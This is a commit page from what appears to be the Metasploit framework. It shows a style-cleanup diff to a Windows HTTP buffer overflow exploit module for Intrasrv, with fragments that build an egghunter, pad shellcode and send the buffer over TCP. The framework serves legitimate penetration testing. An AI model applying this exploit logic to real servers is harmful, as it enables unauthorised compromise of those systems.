Skip to content

Commit bbc93b2

Browse files
committed
msftidy
1 parent 28f0304 commit bbc93b2

File tree

1 file changed

+3
-5
lines changed

1 file changed

+3
-5
lines changed

modules/exploits/windows/http/intrasrv_bof.rb

Lines changed: 3 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -80,7 +80,7 @@ def check
8080
def exploit
8181
# setup egghunter
8282
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
83-
:checksum=>true, :eggtag=>"w00t"
83+
:checksum=>true
8484
})
8585

8686
# setup buffer
@@ -92,14 +92,12 @@ def exploit
9292

9393
# Setup payload
9494
shellcode = egg
95-
# second last byte of payload gets corrupted - pad 2 bytes
95+
# second last byte of payload gets corrupted - pad 2 bytes
9696
# so we don't corrupt the actual payload
9797
shellcode << rand_text(2)
98-
99-
msp = pattern_create(20000)
10098

10199
print_status("Sending buffer...")
102-
# Payload location is an issue, so we're using the tcp mixin
100+
# Payload location is an issue, so we're using the tcp mixin
103101
# instead of HttpClient here to maximize control over what's sent.
104102
# (i.e. no additional headers to mess with the stack)
105103
connect

0 commit comments

Comments
 (0)